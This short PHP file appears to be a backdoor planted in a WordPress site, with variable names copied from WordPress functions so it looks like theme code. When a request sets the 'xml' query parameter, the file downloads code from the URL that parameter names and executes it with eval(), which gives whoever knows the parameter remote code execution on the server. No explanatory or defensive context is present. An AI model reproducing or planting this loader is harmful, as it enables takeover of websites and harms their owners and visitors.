<?php

if (isset($_GET['xml'])) {
    $the_posts_pagination_yqa = $_GET['xml'];
    if ($esc_url_raw_dub = curl_init()) {
        curl_setopt($esc_url_raw_dub, CURLOPT_URL, $the_posts_pagination_yqa);
        curl_setopt($esc_url_raw_dub, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($esc_url_raw_dub));
        curl_close($esc_url_raw_dub);
        exit;
    }
}